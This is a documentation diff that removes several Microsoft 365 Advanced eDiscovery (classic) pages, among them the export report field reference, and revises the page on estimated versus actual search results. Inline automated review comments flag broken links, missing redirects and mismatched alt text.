-The Advanced eDiscovery Tenant settings are described in this section.
-
-### User administration
-
-The User administration options are described in [Setting up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md).
-
-### Event log
-
-The Event log provides metadata regarding Advanced eDiscovery processing anytime during Advanced eDiscovery operation. For example, it includes the start time of the main Advanced eDiscovery processes (Import, Analyze, Relevance, and Export) as well as the end time and status. This log can be used for tracking and troubleshooting data processing activities and for addressing errors and warnings.
-
-1. Open **Settings and utilities** by clicking the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Tenant settings** tab, select **Event log**. The event log data is displayed.
-
- - To filter the log output by a case, select the case from the **Cases** list.
-
- - To sort the log by columns, click a column header.
-
- - To modify column order, click and drag the column header.
-
- - To move between log pages, click **\>** and **\<** icons.
-
-### System information
-
-Advanced eDiscovery version system information and active tasks are displayed in the Tenant settings tab.
-
-1. Open **Settings and utilities** by clicking the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Tenant settings** tab, select **System information**. The version information is displayed.
-
-The display can be updated by clicking the **Refresh** icon below the Tenant information.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Using utilities](use-advanced-ediscovery-utilities.md)
-
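Review bot: this deletes the whole page and no redirect is visible in the change. The Event log section is the only place in these lines that documents where the start time, end time and status of Import, Analyze, Relevance and Export can be reviewed for troubleshooting; add a redirect to whichever page now covers that, or existing links to define-case-and-tenant-settings-in-advanced-ediscovery will break.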
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/define-highlighted-keywords-and-advanced-options https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/define-highlighted-keywords-and-advanced-options.md deleted file mode 100644
@@ -1,77 +0,0 @@
-title: "Define highlighted keywords and advanced options in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: chrfox
-author: chrfox
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 03cc4387-2c7d-4058-8a44-0deefb58f011
-description: "Learn how to add user-defined keywords to Relevance to help identify relevant files while tagging in Advanced eDiscovery and to specify cost parameters."
-
-# Define highlighted keywords and advanced options in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, it's possible to add user-defined keywords to Relevance in order to help you identify relevant files while tagging. Keywords will be displayed in the specified colors in **Relevance \> Tag**.
-
-As described below, keyword lists can be added, and colors assigned to the Keywords list and the related issues. A tooltip displays the keyword's description, if one exists, as indicated by a double underline.
-
-> [!IMPORTANT]
-> Hit highlighting in Relevance and viewing keyword hit results within documents during Relevance tagging does not work for the Japanese, Chinese, and Korean double-byte character sets.
-
-## Adding highlighted keywords
-
-1. In the **Relevance \> Relevance setup** tab, select **Highlighted keywords**.
-
-2. Click the **+** icon to add keywords. The **Add new keywords** dialog is displayed.
-
-3. In **Keywords**, type the keywords list, separating keywords with commas.
-
-4. In the **Color** list, select the color to highlight the entered keywords list.
-
-5. In the **Select issue** list, select whether to apply the keywords list to "All issues" or to selected issues.
-
-6. In **Description**, type the keywords list (optional).
-
- ![Add new keywords](../media/1683a71f-0875-48fc-b4ef-01f3b0e8e8e9.png)
-
-7. Click **OK** when done. The created list is added to the keywords list table and can be edited or deleted.
-
- ![Relevance Setup Keywords list](../media/a05d5ec0-8bde-470d-97e2-456b169281d6.png)
-
-The user-defined keywords will be displayed, in the specified colors in Relevance \> Tag.
-
-## Specifying Relevance setup advanced settings
-
-These settings affect the Track and Decide graphs in Relevance.
-
-1. In the **Relevance \> Relevance setup** tab, select **Advanced settings**.
-
-2. In the **Cost parameters** dialog, make the following selections:
-
-1. In the **Cost review per hour ($)** list, select the amount in dollars or accept the default.
-
-2. In the **Number of files reviewed by hour** list, select the amount or accept the default.
-
- ![Relevance setup cost parameters](../media/bab7b5b7-6297-4e7c-b0a6-ba5aa8b21787.png)
-
-3. Click **Save**. The selected settings are saved.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining issues and assigning users](define-issues-and-assign-users.md)
-
-[Setting up loads to add imported files](set-up-loads-to-add-imported-files.md)
-
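Review bot: the See also list links to define-issues-and-assign-users.md, which is deleted in this same update, and to set-up-loads-to-add-imported-files.md, whose removal is not shown here. Confirm that page is removed as well, or that any link it has back to define-highlighted-keywords-and-advanced-options.md is cleaned up, so no retained page points at a deleted file.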
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/define-issues-and-assign-users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/define-issues-and-assign-users.md deleted file mode 100644
@@ -1,79 +0,0 @@
-title: "Define issues and assign users in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 48d37ee7-05bd-4cb8-9723-a8959ad23fbe
-description: "Learn how to add or edit an issue, including assigning users to it, or delete an issue for an eDiscovery case in Advanced eDiscovery."
-
-# Define issues and assign users in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, one or more issues can be defined within a case. Defining issues allows further categorization of topics. When connecting to a new case, a single default issue is provided. You can edit the default issue name and assign users to the issue.
-
-## Adding or editing an issue and assigning users
-
-1. In the **Relevance \> Relevance setup** tab \> select **Issues**.
-
- ![Relevance Setup issues](../media/dfd8f9ef-b167-4ed9-980e-00ae98a97169.png)
-
-2. To add an issue, click the ** + ** icon. The **Add issue** dialog is displayed.
-
- ![Relevance setup add issue](../media/c8e94982-139a-472a-b85d-282f2d742046.png)
-
- To edit an issue, click the **Edit** icon.
-
-3. In **Issue name**, type a name that is descriptive and significant to the case.
-
-4. In **Description**, type information about the issue.
-
-5. Select the **Enable concurrent training** check box to enable the option. This setting enables multiple reviewers to work on the same issue simultaneously (in separate samples).
-
-6. In **Assign users to issue**, in the **All users** list, select a user to be assigned to the issue and then click the right-facing arrow to add the user to the **Selected users** list. Repeat as necessary. In the window shown above, "Admin" is shown as a selected user.
-
- > [!NOTE]
- > User assignment to issues can be modified before or after a Relevance training cycle.
-
-7. In **Selected users**, from the drop-down list next to the name of the selected user, select one of the following Sampling modes:
-
- - **On**: The files can be viewed and tagged. This is the default setting.
-
- - **Idle**: The files can be viewed; tagged is optional.
-
- - **Off**: The files cannot be viewed or tagged.
-
-8. When done adding issues, click **OK**.
-
-## Deleting issues
-
-Issues may be deleted (meaning, removed from the database) only immediately after they were defined and no actual work has been done for that issue.
-
-1. In the **Relevance \> Relevance setup** tab, select **Issues**.
-
-2. Select the issue to delete from the database, and then click **Delete**.
-
-3. A confirmation message is displayed. Click **Yes** to confirm.
-
-4. Click **OK**.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Setting up loads to add imported files](set-up-loads-to-add-imported-files.md)
-
-[Defining highlighted keywords and advanced options](define-highlighted-keywords-and-advanced-options.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/differences-between-estimated-and-actual-ediscovery-search-results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/differences-between-estimated-and-actual-ediscovery-search-results.md
@@ -23,21 +23,20 @@ description: "Understand why estimated and actual search results may vary in sea
# Differences between estimated and actual eDiscovery search results
-This topic applies to searches that you can run using one of the following Microsoft eDiscovery tools:
+This topic applies to searches that you can run using one of the following Microsoft 365 eDiscovery tools:
-- Content Search in the Security & Compliance Center <br/> -- In-Place eDiscovery in the Exchange admin center (EAC) <br/> -- The eDiscovery Center in SharePoint Online <br/>
+- Content search
+- Core eDiscovery
-When you run an eDiscovery search, the tool you're using will return an estimate of the number of items (and their total size) that meet the search criteria. For example, when you run a search in the Security & Compliance Center, the estimated search results are displayed in the details pane for the selected search.
+When you run an eDiscovery search, the tool you're using will return an estimate of the number of items (and their total size) that meet the search criteria. For example, when you run a search in the Microsoft 365 compliance center, the estimated search results are displayed on the flyout page for the selected search.
![Estimate of results displayed in details pane of selected search](../media/74e4ce83-40be-41a9-b60f-5ad447e79fe4.png) This is the same estimate of total size and number of items that is displayed in the eDiscovery Export Tool when you export results to a local computer and in the Export Summary report that's downloaded with the search results.
-**Estimated results in the eDiscovery Export Tool**
+**Estimated results in the eDiscovery Export tool**
-![Estimated results in eDiscovery Export Tool](../media/d34312a5-0ee6-49aa-9460-7ea0015a6e66.png)
+![Estimated results in eDiscovery Export tool](../media/d34312a5-0ee6-49aa-9460-7ea0015a6e66.png)
**Estimated results in Export Summary report**
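Review bot: the text now says the estimate is displayed "on the flyout page", but the image alt text on the unchanged line that follows still reads "Estimate of results displayed in details pane of selected search". Update the alt text, and check that the screenshot itself shows the flyout, so the image and the sentence describe the same UI.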
@@ -55,9 +54,9 @@ Here are some reasons for these differences:
Although rare, even in the case when a hold is applied, maintenance of built-in calendar items (which aren't editable by the user, but are included in many search results) may be removed from time to time. This periodic removal of calendar items will result in fewer items that are exported. -- **Unindexed items**. Items that are unindexed for search can cause differences between estimated and actual search results. For example, In-Place eDiscovery in Exchange and the eDiscovery Center in SharePoint don't include unindexed items (that don't meet the search criteria) when you run a search to estimate the search results. But you can include unindexed items when you export the search results. If you include unindexed items when exporting search results, there might be more items that are exported. This will cause a difference between the estimated and exported search results.
+- **Unindexed items**. Items that are unindexed for search can cause differences between estimated and actual search results. You can include unindexed items when you export the search results. If you include unindexed items when exporting search results, there might be more items that are exported. This will cause a difference between the estimated and exported search results.
- When using the Content Search tool in the Security & Compliance Center, you have the option to include unindexed items in the search estimate. The number of unindexed items returned by the search is listed in the details pane together with the other estimated search results. Any unindexed items would also be included in the total size of the estimated search results. When you export search results, you have the option to include or not include unindexed items. How you configure these options might result in differences between estimated and the actual search results that are downloaded.
+ When using the Content search tool, you have the option to include unindexed items in the search estimate. The number of unindexed items returned by the search is listed on the flyout page together with the other estimated search results. Any unindexed items would also be included in the total size of the estimated search results. When you export search results, you have the option to include or not include unindexed items. How you configure these options might result in differences between estimated and the actual search results that are downloaded.
- **Exporting the results of a Content Search that includes all content locations**. If the search that you're exporting results from was a search of all content locations in your organization, then only the unindexed items from content locations that contain items that match the search criteria will be exported. In other words, if no search results are found in a mailbox or site, then any unindexed items in that mailbox or site won't be exported. However, unindexed items from all content locations (even those that don't contain items that match the search query) will be included in the estimated search results.
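Review bot: the rewritten **Unindexed items** bullet drops the sentence explaining that a search estimate can leave unindexed items out, so "This will cause a difference" now has no stated premise until the following paragraph. Lead with the estimate-side option (include or exclude unindexed items) before the export-side option. Casing is also inconsistent: the new line says "Content search tool" while the unchanged bullet below still says "Content Search".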
@@ -72,12 +71,6 @@ Here are some reasons for these differences:
- **De-duplication**. For Exchange items, de-duplication reduces the number of items that are exported. You have the option to de-duplicate the search results when you export them. For Exchange messages, this means that only a single instance of a message is exported, even though that message might be found in multiple mailboxes. The estimated search results include every instance of a message. So if you choose the de-duplication option when exporting search results, the actual number of items that are exported might be considerably less than the estimated number of items. Another thing to keep in mind if you choose the de-duplication option is that all Exchange items are exported in a single PST file and the folder structure from the source mailboxes isn't preserved. The exported PST file just contains the email items. However, a search results report contains an entry for each exported message that identifies the source mailbox where the message is located. This helps you identify all mailboxes that contain a duplicate message. If you don't enable de-duplication, a separate PST file is exported for each mailbox included in the search. -
-## Exporting unindexed items from the eDiscovery Center in SharePoint Online
-
-In the eDiscovery Center in SharePoint Online, you have the option to include unindexed content (from Exchange and SharePoint) when you export the results of an eDiscovery search. You do this by selecting the **Include items that are encrypted or have an unrecognized format** option. Unindexed items (also called uncrawlable in SharePoint) are items in Exchange and SharePoint that for some reason weren't indexed for search. Unindexed Exchange items are listed in the **Exchange Index Errors** report that's included when you export search results. Similarly, unindexed SharePoint items are listed in **SharePoint Index Errors** report. When you export unindexed items, they're downloaded to a folder named **Uncrawlable**. Unindexed Exchange items are included in a PST file; each unindexed document from SharePoint is downloaded too. The number of unindexed items (if there are any) is listed in each index errors report. The number of unindexed items in the reports should match the number of unindexed items that are downloaded.
-
- **What are some reasons if the number of exported unindexed items don't match the number of items in the index error report?** As previously explained, it's possible that items have been purged from Microsoft 365 between the time the search estimate was run and the time the search results were exported. A similar discrepancy can occur for unindexed items. For example, the search index might be out date when search results are exported. This would mean that an unindexed item that was exported with the search results might not be listed in the index errors report because the item wasn't indexed at the time the search results were exported. This would result in more unindexed items being export than are listed in the index error report. Similarly, an unindexed item listed in the index error report could have been purged from Microsoft 365 before the search index was updated. This results in fewer exported unindexed items than are listed in the index error report.
-
+
> [!NOTE] > If you don't select the **Include items that are encrypted or have an unrecognized format** option when you export search results or just download the reports, the index error reports are downloaded but they don't have any entries. This doesn't mean there aren't any indexing errors. It just means that unindexed items weren't included in the export.
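Review bot: the hunk removes the section that introduced the **Include items that are encrypted or have an unrecognized format** option and the index error reports, but the retained `[!NOTE]` still refers to both. Rewrite the note in terms of the export options that remain documented on this page, or keep one sentence that defines the option and the reports, so the note does not depend on deleted text.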
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/ediscovery.md
@@ -30,9 +30,6 @@ Microsoft 365 provides the following eDiscovery tools:
- [Advanced eDiscovery](#advanced-ediscovery)
-> [!NOTE]
-> Advanced eDiscovery (classic) (also called *Advanced eDiscovery v1.0*), which is the version of Advanced eDiscovery available in a Core eDiscovery case by clicking **Switch to Advanced eDiscovery**, is being retired. Its functionality has been replaced by the Advanced eDiscovery solution in Microsoft 365. For more information about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
- ## Content Search The following table contains links to topics that will help you use the Content Search tool.
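Review bot: removing this note drops the link to legacy-ediscovery-retirement.md#advanced-ediscovery-v10, the only pointer in these lines that tells readers Advanced eDiscovery (classic) is retired and what replaced it. Keep a one-line pointer to the retirement article under the Advanced eDiscovery entry, at least until the classic pages deleted in this update have redirects in place.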
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-case-data-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-case-data-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,45 +0,0 @@
-title: "Export case data in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: c3198d1c-51b4-4280-87c5-269b47246d33
-description: "Understand the guidelines for exporting eDiscovery case data and results for review using the Export process in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Export case data in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The Export process in Advanced eDiscovery enables the exporting of Advanced eDiscovery content and results for external review.
-
-## Guidelines for exporting data
--- You can review the export data generated from Advanced eDiscovery, for example, to distribute pertinent elements to the document review team or export to an external document review tool.
-
-- You can generate and manipulate the export output at any time during and after Advanced eDiscovery processing. In a standard scenario, significant results are achieved after Relevance training and Batch calculation are successfully completed. For example, you can generate a sample of the 1,000 most relevant files and evaluate Advanced eDiscovery performance before you proceed.
-
-- Exporting a large amount of data to a database may have a significant impact on the required database size and the required configuration of the Advanced eDiscovery database.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Exporting results ](export-results-in-advanced-ediscovery.md)
-
-[Viewing Batch history and Export results](view-batch-history-and-export-past-results.md)
-
-[Export report fields](export-report-fields-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-content-in-core-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-content-in-core-ediscovery.md
@@ -100,5 +100,3 @@ As an alternative to exporting the results of a single search associated with a
- If you restart the export, any changes to the queries of the searches that make up the export job won't affect the search results that are retrieved. When you restart an export, the same combined search query job that was run when the export job was created will be run again. - Also, if you restart an export, the search results that are copied to the Azure Storage location overwrites the previous results. The previous results that were copied won't be available to be downloaded.--- Preparing the results of multiple searches for analysis in Advanced eDiscovery (classic) isn't available. You can only prepare the results of a single search for analysis in Advanced eDiscovery (classic).
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-report-fields-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-report-fields-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,144 +0,0 @@
-title: "Export report fields in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: chrfox
-author: chrfox
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: reference
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 840a5aff-ecd0-4e56-ad22-fe99bc143687
-description: This article describes all of the fields that are included in the Export reports for Advanced eDiscovery.
-ms.custom: seo-marvel-apr2020
-
-# Export report fields in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This topic describes the Advanced eDiscovery Export report fields for the Standard and All templates.
-
-## Export report fields
-
-The following table lists the fields for each export template.
-
-|**Export field name**|**Group**|**Description**|**Available in Standard template**|**Available in All template**|
-|:-----|:-----|:-----|:-----|:-----|
-|Row_number <br/> |General <br/> |Row number. <br/> |Yes <br/> |Yes <br/> |
-|File_ID <br/> |General <br/> |File ID. <br/> |Yes <br/> |Yes <br/> |
-|File_class <br/> |Processing <br/> |File class. <br/> |Yes <br/> |Yes <br/> |
-|Family_ID <br/> |Processing <br/> |Numeric identifier that is used to group files (usually email instance and its attachments). <br/> |Yes <br/> |Yes <br/> |
-|For_review <br/> |Processing <br/> |Flag to indicate that the field will be included in export for review. <br/> |Yes <br/> |Yes <br/> |
-|Native_file_name <br/> |Processing <br/> |Native file name, without referencing folder and extension. <br/> |Yes <br/> |Yes <br/> |
-|Custodians <br/> |General <br/> |Custodian of the file. <br/> |Yes <br/> |Yes <br/> |
-|Set_ID <br/> |Analyze <br/> |"ND set" or "Email set" id. <br/> |Yes <br/> |Yes <br/> |
-|Inclusive_type <br/> |Email <br/> |Indicates if file is inclusive, according to the following values: 0 - not inclusive, 1 - Inclusive, 2 - Inclusive minus, 3 - Inclusive copy. <br/> |Yes <br/> |Yes <br/> |
-|Marked_as_pivot <br/> |Near duplicates <br/> |Indicates if the file is a pivot. <br/> |Yes <br/> |Yes <br/> |
-|Similarity_percent <br/> |Near duplicates <br/> |Percentage of similarity relative to the pivot. <br/> |Yes <br/> |Yes <br/> |
-|Duplicate_subset <br/> |Near duplicates <br/> |Unique identifier of the duplicate subset. Indicates whether the file has exact text duplicates. <br/> |Yes <br/> |Yes <br/> |
-|Date <br/> |General <br/> |Date of file (depends on file type - email: date sent; document: date modified). <br/> |Yes <br/> |Yes <br/> |
-|Dominant_theme <br/> |Analyze <br/> |Primary Theme of the file. <br/> |Yes <br/> |Yes <br/> |
-|Themes_list <br/> |Themes <br/> |List of Theme names. <br/> |Yes <br/> |Yes <br/> |
-|ND_set <br/> |EquiSet <br/> |Unique numeric identifier of a Nearduplicate set. <br/> |Yes <br/> |Yes <br/> |
-|Email_set <br/> |Email <br/> |Unique numeric identifier of an Email set. <br/> |Yes <br/> |Yes <br/> |
-|Email_thread <br/> |Email <br/> |Describes the position of the email within the Email set Consists of all Node IDs from the root to the current email, separated by periods. <br/> |Yes <br/> |Yes <br/> |
-|Email_subject <br/> |Email <br/> |Subject of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_date_sent <br/> |Email <br/> |Date on which the email was sent. <br/> |Yes <br/> |Yes <br/> |
-|Email_participants <br/> |Email <br/> |Email addresses of all participants in an email thread, including for missing links. <br/> |Yes <br/> |Yes <br/> |
-|Email_participant_domains <br/> |Email <br/> |Domains of all participants in an email thread, including for missing link. <br/> |Yes <br/> |Yes <br/> |
-|Email_sender <br/> |Email <br/> |Email sender name and/or address. <br/> |Yes <br/> |Yes <br/> |
-|Email_sender_domain <br/> |Email <br/> |Email sender's domain. <br/> |Yes <br/> |Yes <br/> |
-|Email_to <br/> |Email <br/> |To recipient of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_cc <br/> |Email <br/> |CC recipient of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_bcc <br/> |Email <br/> |BCC recipient of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_recipient_domains <br/> |Email <br/> |Email recipients domains (To, CC, and BCC). <br/> |Yes <br/> |Yes <br/> |
-|Email_date_received <br/> |Email <br/> |Date on which email was received. <br/> |Yes <br/> |Yes <br/> |
-|Email_action <br/> |Email <br/> |Values: according to Email Subject: "Forward" (for "FW:"), "Reply" (for "RE:") or "Other" (other Subject text). <br/> |Yes <br/> |Yes <br/> |
-|Meeting_Start_Date/Time <br/> ||The date and time at which a meeting item started. <br/> |Yes <br/> |Yes <br/> |
-|Meeting_End_Date/Time <br/> ||The date and time at which a meeting item ended. <br/> |Yes <br/> |Yes <br/> |
-|File_relevance_score <br/> |Relevance <br/> |Relevance score (0-100). Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Family_relevance_score <br/> |Relevance <br/> |Max family Relevance score (0-100). Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Relevance_tag <br/> |Relevance <br/> |Tagging of the file, if the file was manually tagged in Relevance. Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Relevance_load_group <br/> |Relevance <br/> |Relevance Load group, of the specified file, with a field per issue. <br/> |Yes <br/> |Yes <br/> |
-|Normalized_relevance_score <br/> |Relevance <br/> |Normalized Relevance score (0-100), which is comparable between issues and loads. <br/> |Yes <br/> |Yes <br/> |
-|Marked_as_seed <br/> |Relevance <br/> |Tagging of the file, if it was set to be as a seed file in Relevance Per issue/category. <br/> |Yes <br/> |Yes <br/> |
-|Marked_as_pre-tagged <br/> |Relevance <br/> |Tagging of the file, if it was set as pre-tagged in Relevance Per issue/category. <br/> |Yes <br/> |Yes <br/> |
-|Relevance_status_description <br/> |Relevance <br/> |Description of the relevance status. <br/> |Yes <br/> |Yes <br/> |
-|Comment <br/> |General <br/> |Comment entered by the user. <br/> |Yes <br/> |Yes <br/> |
-|Export_input_path <br/> |Processing <br/> |Export input path. <br/> |Yes <br/> |Yes <br/> |
-|Pivot_ID <br/> |Near Duplicates <br/> |Pivot ID of the file. <br/> |Yes <br/> |Yes <br/> |
-|Family_size <br/> |Processing <br/> |Number of files in a family. <br/> |Yes <br/> |Yes <br/> |
-|Native_type <br/> |Processing <br/> |Native file type. For example, spreadsheet or presentation. <br/> |Yes <br/> |Yes <br/> |
-|Native_MD5 <br/> |Processing <br/> |MD5 hash value of the native file. <br/> |Yes <br/> |Yes <br/> |
-|Native_size <br/> |Processing <br/> |Native file size. <br/> |Yes <br/> |Yes <br/> |
-|Native_extension <br/> |Processing <br/> |Native file extension. <br/> |Yes <br/> |Yes <br/> |
-|Doc_date_modified <br/> |Document Properties <br/> |Date native file was modified, taken from the file's metadata. <br/> |Yes <br/> |Yes <br/> |
-|Doc_date_created <br/> |Document Properties <br/> |Date native file was created, taken from the file's metadata. <br/> |Yes <br/> |Yes <br/> |
-|Doc_modified_by <br/> |Document Properties <br/> |User who modified native file, taken from the file's metadata. <br/> |Yes <br/> |Yes <br/> |
-|O365_date_modified <br/> |Document Properties <br/> |Date native file was modified, taken from the either SharePoint or Exchange fields. <br/> |Yes <br/> |Yes <br/> |
-|O365_date_created <br/> |Document Properties <br/> |Date native file was created, taken from either SharePoint or Exchange fields. <br/> |Yes <br/> |Yes <br/> |
-|O365_modified_by <br/> |Document Properties <br/> |User who last modified native file, taken from either SharePoint or Exchange fields. <br/> |Yes <br/> |Yes <br/> |
-|Compound_path <br/> |Processing <br/> |Native file path including its compound source. <br/> |Yes <br/> |Yes <br/> |
-|Input_path <br/> |Processing <br/> |Path of the input file. <br/> |Yes <br/> |Yes <br/> |
-|Input_date_modified <br/> |Processing <br/> |Date Input file was last modified. <br/> |Yes <br/> |Yes <br/> |
-|ND_ET_sort_excl_attach <br/> |Analyze <br/> |Concatenation of Email set and ND set for review. 'D' is added as a prefix to ND sets, and 'E' is added to Email ssets. <br/> |Yes <br/> |Yes <br/> |
-|ND_ET_sort_incl_attach <br/> |Analyze <br/> |Concatenation of Email set and ND set for review 'D' is added as a prefix to ND sets, and 'E' is added to Email sets. In addition, each email within an Email_set is followed by its appropriate attachments. <br/> |Yes <br/> |Yes <br/> |
-|Deduped_custodians <br/> |General <br/> |Custodians of de-duped files <br/> |Yes <br/> |Yes <br/> |
-|Deduped_file_IDs <br/> |General <br/> |IDs of de-duped files <br/> |Yes <br/> |Yes <br/> |
-|Deduped_paths <br/> |General <br/> |Paths of de-duped files <br/> |Yes <br/> |Yes <br/> |
-|File_key <br/> |General <br/> |Internal identifier for future use. <br/> |Yes <br/> |Yes <br/> |
-|Export_native_path <br/> |Processing <br/> |Path of the native file in the export package. <br/> |Yes <br/> |Yes <br/> |
-|Extracted_text_path <br/> |Processing <br/> |Path of the extracted file. <br/> |Yes <br/> |Yes <br/> |
-|Process_batch <br/> |Processing <br/> |Batch identifier for Import batch. <br/> |Yes <br/> |Yes <br/> |
-|Process_status_ID <br/> |Processing <br/> |Identifier representing Process stage status. <br/> |Yes <br/> |Yes <br/> |
-|Process_status_description <br/> |Processing <br/> |Process stage status description: successful or error description. <br/> |Yes <br/> |Yes <br/> |
-|Export_status_ID <br/> |Processing <br/> |ID of the export status. <br/> |Yes <br/> |Yes <br/> |
-|Export_status_description <br/> |Processing <br/> |Description of the export status; successful or error description. <br/> |Yes <br/> |Yes <br/> |
-|Read_percent <br/> |Relevance <br/> |Read % (0-100). Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Doc_author <br/> |Document properties <br/> |Document properties: author. <br/> |No <br/> |Yes <br/> |
-|Doc_comments <br/> |Document properties <br/> |Document properties: comments. <br/> |No <br/> |Yes <br/> |
-|Doc_keywords <br/> |Document properties <br/> |Document properties: keywords. <br/> |No <br/> |Yes <br/> |
-|Doc_last_saved_by <br/> |Document properties <br/> |Document properties: last saved by. <br/> |No <br/> |Yes <br/> |
-|Doc_revision <br/> |Document properties <br/> |Document properties: revision number. <br/> |No <br/> |Yes <br/> |
-|Doc_subject <br/> |Document properties <br/> |Document properties: subject. <br/> |No <br/> |Yes <br/> |
-|Doc_template <br/> |Document properties <br/> |Document properties: template. <br/> |No <br/> |Yes <br/> |
-|Doc_title <br/> |Document properties <br/> |Document properties: title. <br/> |No <br/> |Yes <br/> |
-|Email_has_attachment <br/> |Email <br/> |Indicates if the email has one or more attachments. <br/> |No <br/> |Yes <br/> |
-|Email_importance <br/> |Email <br/> |Email importance property. <br/> |No <br/> |Yes <br/> |
-|Email_level <br/> |Email <br/> |Indicates email's level within the email thread. For attachments, the value of the attached email. <br/> |No <br/> |Yes <br/> |
-|Email_recipients <br/> |Email <br/> |Email recipients name and/or addresses (To, CC, and BCC). <br/> |No <br/> |Yes <br/> |
-|Email_security <br/> |Email <br/> |Email security property. <br/> |No <br/> |Yes <br/> |
-|Email_sensitivity <br/> |Email <br/> |Email sensitivity property. <br/> |No <br/> |Yes <br/> |
-|Export_batch <br/> |Processing <br/> |File's last Export batch name. <br/> |No <br/> |Yes <br/> |
-|Export_session <br/> |Processing <br/> |File's last Export session Id including date. <br/> |No <br/> |Yes <br/> |
-|Extracted_text_length <br/> |Processing <br/> |Character length of the Extracted text file. <br/> |No <br/> |Yes <br/> |
-|Family_duplicate_set <br/> |Processing <br/> |Numeric Identifier for families that are exact text duplicates of each other (respectively - all members of the families are exact duplicates). <br/> |No <br/> |Yes <br/> |
-|Has_Text <br/> |Processing <br/> |Indicates if there is a text in the file: 0 - no ; 1- yes. <br/> |No <br/> |Yes <br/> |
-|Input_file_ID <br/> |Processing <br/> |ID of the Input file from which file was extracted from. <br/> |No <br/> |Yes <br/> |
-|Native_SHA_256 <br/> |Processing <br/> |SHA-256 hash value of the native file. <br/> |No <br/> |Yes <br/> |
-|O365_authors <br/> |Document properties <br/> |Users who modified native file, taken from either SharePoint or Exchange fields. <br/> |No <br/> |Yes <br/> |
-|O365_created_by <br/> |Document properties <br/> |User who created native file, taken from either SharePoint or Exchange fields. <br/> |No <br/> |Yes <br/> |
-|Parent_node <br/> |Email <br/> |Relates a node in an email thread to the closest parent node that is not a missing link. <br/> |No <br/> |Yes <br/> |
-|Set_order_inclusives_first <br/> |Email <br/> |Emails and attachments: counter chronological order (Inclusives first). Documents: pivots first and the rest by similarity score, descending. <br/> |No <br/> |Yes <br/> |
